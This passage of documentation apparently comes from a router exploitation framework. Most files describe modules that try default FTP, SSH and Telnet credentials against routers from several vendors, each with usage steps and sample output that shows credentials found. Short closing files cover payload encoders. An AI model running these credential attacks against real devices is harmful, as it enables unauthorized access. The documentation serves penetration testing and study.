thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/netsys/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netsys Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netsys/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netsys/ftp_default_creds rsf (Netsys Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netsys Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/netsys/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netsys Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netsys/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netsys/ssh_default_creds rsf (Netsys Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netsys Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/netsys/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netsys Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netsys/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netsys/telnet_default_creds rsf (Netsys Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netsys Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/pfsense/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against PFSense Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/pfsense/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/pfsense/ftp_default_creds rsf (PFSense Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (PFSense Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/pfsense/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against PFSense Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/pfsense/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/pfsense/ssh_default_creds rsf (PFSense Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (PFSense Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/pfsense/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against PFSense Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/pfsense/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/pfsense/telnet_default_creds rsf (PFSense Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (PFSense Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/technicolor/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Technicolor Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/technicolor/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/technicolor/ftp_default_creds rsf (Technicolor Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Technicolor Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/technicolor/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Technicolor Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/technicolor/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/technicolor/ssh_default_creds rsf (Technicolor Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Technicolor Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/technicolor/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Technicolor Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/technicolor/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/technicolor/telnet_default_creds rsf (Technicolor Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Technicolor Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/thomson/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Thomson Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/thomson/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/thomson/ftp_default_creds rsf (Thomson Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Thomson Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/thomson/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Thomson Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/thomson/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/thomson/ssh_default_creds rsf (Thomson Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Thomson Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/thomson/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Thomson Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/thomson/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/thomson/telnet_default_creds rsf (Thomson Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Thomson Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/tplink/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against TP-Link Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/tplink/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/tplink/ftp_default_creds rsf (TP-Link Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (TP-Link Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/tplink/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against TP-Link Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/tplink/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/tplink/ssh_default_creds rsf (TP-Link Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (TP-Link Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/tplink/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against TP-Link Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/tplink/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/tplink/telnet_default_creds rsf (TP-Link Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (TP-Link Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/ubiquiti/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Ubiquiti Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ubiquiti/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ubiquiti/ftp_default_creds rsf (Ubiquiti Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Ubiquiti Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/ubiquiti/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Ubiquiti Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ubiquiti/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ubiquiti/ssh_default_creds rsf (Ubiquiti Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Ubiquiti Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/ubiquiti/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Ubiquiti Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ubiquiti/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ubiquiti/telnet_default_creds rsf (Ubiquiti Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Ubiquiti Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/zte/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against ZTE Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zte/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zte/ftp_default_creds rsf (ZTE Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (ZTE Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/zte/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against ZTE Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zte/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zte/ssh_default_creds rsf (ZTE Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (ZTE Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/zte/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against ZTE Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zte/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zte/telnet_default_creds rsf (ZTE Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (ZTE Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/zyxel/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Zyxel Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zyxel/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zyxel/ftp_default_creds rsf (Zyxel Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Zyxel Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/zyxel/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Zyxel Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zyxel/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zyxel/ssh_default_creds rsf (Zyxel Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Zyxel Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/zyxel/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Zyxel Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zyxel/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zyxel/telnet_default_creds rsf (Zyxel Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Zyxel Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/encoders/perl/base64.md ================================================ ## Description Module encodes Perl payload to base64 format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/perl/base64` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/perl/base64 rsf (Perl Base64 Encoder) > show info Name: Perl Base64 Encoder Description: Module encodes PERL payload to Base64 format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/encoders/perl/hex.md ================================================ ## Description Module encodes Perl payload to hex format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/perl/hex` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/perl/hex rsf (Perl Hex Encoder) > show info Name: Perl Hex Encoder Description: Module encodes PERL payload to Hex format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/encoders/php/base64.md ================================================ ## Description Module encodes PHP payload to base64 format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/php/base64` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/php/base64 rsf (PHP Base64 Encoder) > show info Name: PHP Base64 Encoder Description: Module encodes PHP payload to Base64 format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/encoders/php/hex.md ================================================ ## Description Module encodes PHP payload to Hex format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/php/hex` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/php/hex rsf (PHP Hex Encoder) > show info Name: PHP Hex Encoder Description: Module encodes PHP payload to Hex format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/encoders/python/base64.md ================================================ ## Description Module encodes Python payload to base64 format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/python/base64` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/python/base64 rsf (Python Base64 Encoder) > show info Name: Python Base64 Encoder Description: Module encodes Python payload to Base64 format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/encoders/python/hex.md ================================================ ## Description Module encodes Python payload to hex format. ## Verification Steps 1. Start 